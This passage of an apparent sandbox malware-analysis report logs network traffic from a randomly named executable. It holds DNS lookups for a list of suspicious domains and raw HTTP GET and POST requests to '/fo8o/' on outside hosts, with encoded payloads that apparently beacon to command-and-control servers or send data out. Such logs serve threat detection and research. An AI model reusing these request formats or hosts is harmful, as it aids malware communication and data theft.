                                                                            Nov 22, 2024 07:51:58.894296885 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:58.897321939 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:51:59.016807079 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185381889 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185403109 CET805001766.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:00.185604095 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:00.411158085 CET5001780192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.431248903 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.550877094 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.550996065 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.553869009 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:01.673835993 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673907995 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673943996 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.673993111 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674112082 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674207926 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674312115 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674340963 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:01.674401045 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.107714891 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.411087036 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.439923048 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.439964056 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.439991951 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.440046072 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.442075968 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.442118883 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.442514896 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.442605972 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:03.531466007 CET805001866.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:03.531589985 CET5001880192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.125941038 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.247028112 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:04.247258902 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.249063015 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:04.368619919 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483556032 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483649969 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:05.483778954 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:05.489032030 CET5001980192.168.2.466.29.149.46
                                                                            Nov 22, 2024 07:52:05.609091043 CET805001966.29.149.46192.168.2.4
                                                                            Nov 22, 2024 07:52:11.384088039 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.503741980 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:11.503843069 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.506185055 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:11.626734018 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.871778965 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.872144938 CET8050020195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:12.872201920 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:13.020571947 CET5002080192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.039726973 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.159259081 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:14.161061049 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.165221930 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:14.284714937 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474142075 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474369049 CET8050021195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:15.474452972 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:15.676908016 CET5002180192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.695655107 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.815228939 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.815352917 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.819015980 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:16.938747883 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938766003 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938791990 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938803911 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938829899 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938925982 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.938939095 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.939101934 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:16.939116001 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324264050 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324315071 CET8050022195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:18.324544907 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:18.333029985 CET5002280192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.352854967 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.472328901 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:19.472431898 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.474291086 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:19.594122887 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826541901 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826776981 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:20.826824903 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:20.830018997 CET5002380192.168.2.4195.110.124.133
                                                                            Nov 22, 2024 07:52:20.949686050 CET8050023195.110.124.133192.168.2.4
                                                                            Nov 22, 2024 07:52:43.268219948 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.387768030 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:43.387845993 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.390568018 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:43.510050058 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.586931944 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.587518930 CET8050024217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:44.587580919 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:44.895643950 CET5002480192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:45.914364100 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.035554886 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:46.037342072 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.041043043 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:46.160571098 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.290750980 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.292061090 CET8050025217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:47.292110920 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:47.551882982 CET5002580192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.573008060 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.693116903 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.693340063 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.697500944 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:48.817122936 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817186117 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817286968 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817357063 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817378998 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817397118 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817462921 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817475080 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:48.817519903 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.939519882 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.940186977 CET8050026217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:49.941492081 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:50.223387957 CET5002680192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.226980925 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.346633911 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:51.346713066 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.349225998 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:51.468784094 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599158049 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599400997 CET8050027217.196.55.202192.168.2.4
                                                                            Nov 22, 2024 07:52:52.599726915 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:52.601929903 CET5002780192.168.2.4217.196.55.202
                                                                            Nov 22, 2024 07:52:52.721409082 CET8050027217.196.55.202192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 07:49:26.516429901 CET | 61352 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:49:27.329732895 CET | 53 | 61352 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:49:44.102190971 CET | 62002 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:49:44.522835970 CET | 53 | 62002 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:49:52.618645906 CET | 64267 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:49:53.371068001 CET | 53 | 64267 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:50:08.347546101 CET | 56896 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:50:08.585517883 CET | 53 | 56896 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:50:16.649967909 CET | 65185 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:50:17.436307907 CET | 53 | 65185 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:51:32.008706093 CET | 64277 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:51:32.386326075 CET | 53 | 64277 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:51:47.290138006 CET | 58909 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:51:47.506942987 CET | 53 | 58909 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:51:55.571535110 CET | 53823 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:51:56.113092899 CET | 53 | 53823 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:52:10.574915886 CET | 62593 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:52:11.380902052 CET | 53 | 62593 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:52:25.837023020 CET | 61093 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:52:26.012783051 CET | 53 | 61093 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:52:34.086966991 CET | 56866 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:52:34.467658043 CET | 53 | 56866 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:52:42.526237011 CET | 54990 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:52:43.265321970 CET | 53 | 54990 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:52:57.618638039 CET | 53807 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:52:57.855349064 CET | 53 | 53807 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 07:53:06.369107962 CET | 53715 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 07:53:06.710083961 CET | 53 | 53715 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 22, 2024 07:49:26.516429901 CET | 192.168.2.4 | 1.1.1.1 | 0x5c66 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:49:44.102190971 CET | 192.168.2.4 | 1.1.1.1 | 0x4fb2 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:49:52.618645906 CET | 192.168.2.4 | 1.1.1.1 | 0x28b5 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:50:08.347546101 CET | 192.168.2.4 | 1.1.1.1 | 0x5ef0 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:50:16.649967909 CET | 192.168.2.4 | 1.1.1.1 | 0x7f92 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:32.008706093 CET | 192.168.2.4 | 1.1.1.1 | 0x9c86 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:47.290138006 CET | 192.168.2.4 | 1.1.1.1 | 0x251 | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:55.571535110 CET | 192.168.2.4 | 1.1.1.1 | 0x5e89 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:10.574915886 CET | 192.168.2.4 | 1.1.1.1 | 0xef61 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:25.837023020 CET | 192.168.2.4 | 1.1.1.1 | 0x8d14 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:34.086966991 CET | 192.168.2.4 | 1.1.1.1 | 0xcaa9 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:42.526237011 CET | 192.168.2.4 | 1.1.1.1 | 0x822d | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:57.618638039 CET | 192.168.2.4 | 1.1.1.1 | 0xb7fa | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:53:06.369107962 CET | 192.168.2.4 | 1.1.1.1 | 0x52ea | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 22, 2024 07:49:27.329732895 CET | 1.1.1.1 | 192.168.2.4 | 0x5c66 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:49:44.522835970 CET | 1.1.1.1 | 192.168.2.4 | 0x4fb2 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:49:53.371068001 CET | 1.1.1.1 | 192.168.2.4 | 0x28b5 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:50:08.585517883 CET | 1.1.1.1 | 192.168.2.4 | 0x5ef0 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:50:17.436307907 CET | 1.1.1.1 | 192.168.2.4 | 0x7f92 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:50:17.436307907 CET | 1.1.1.1 | 192.168.2.4 | 0x7f92 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:50:17.436307907 CET | 1.1.1.1 | 192.168.2.4 | 0x7f92 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:32.386326075 CET | 1.1.1.1 | 192.168.2.4 | 0x9c86 | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:47.506942987 CET | 1.1.1.1 | 192.168.2.4 | 0x251 | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:51:56.113092899 CET | 1.1.1.1 | 192.168.2.4 | 0x5e89 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:11.380902052 CET | 1.1.1.1 | 192.168.2.4 | 0xef61 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:52:11.380902052 CET | 1.1.1.1 | 192.168.2.4 | 0xef61 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:26.012783051 CET | 1.1.1.1 | 192.168.2.4 | 0x8d14 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:34.467658043 CET | 1.1.1.1 | 192.168.2.4 | 0xcaa9 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:43.265321970 CET | 1.1.1.1 | 192.168.2.4 | 0x822d | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 07:52:43.265321970 CET | 1.1.1.1 | 192.168.2.4 | 0x822d | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:52:57.855349064 CET | 1.1.1.1 | 192.168.2.4 | 0xb7fa | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 22, 2024 07:53:06.710083961 CET | 1.1.1.1 | 192.168.2.4 | 0x52ea | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                                            • www.3xfootball.com
                                                                            • www.goldenjade-travel.com
                                                                            • www.magmadokum.com
                                                                            • www.rssnewscast.com
                                                                            • www.techchains.info
                                                                            • www.elettrosistemista.zip
                                                                            • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:49:27.460985899 CET | 514 | OUT | GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.3xfootball.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 22, 2024 07:49:29.052217007 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 22 Nov 2024 06:49:28 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 116.50.37.244 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:49:53.495199919 CET | 797 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
Nov 22, 2024 07:49:55.060182095 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 22 Nov 2024 06:49:53 GMT
Connection: close
Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 116.50.37.244 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:49:56.145203114 CET | 817 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
Nov 22, 2024 07:49:57.761873960 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 22 Nov 2024 06:49:57 GMT
Connection: close
Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 116.50.37.244 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:49:58.802984953 CET | 10899 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10302
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ml18S= [TRUNCATED]
Nov 22, 2024 07:50:00.373270988 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 22 Nov 2024 06:49:59 GMT
Connection: close
Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 116.50.37.244 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:50:01.692224026 CET | 521 | OUT | GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.goldenjade-travel.com
Connection: close
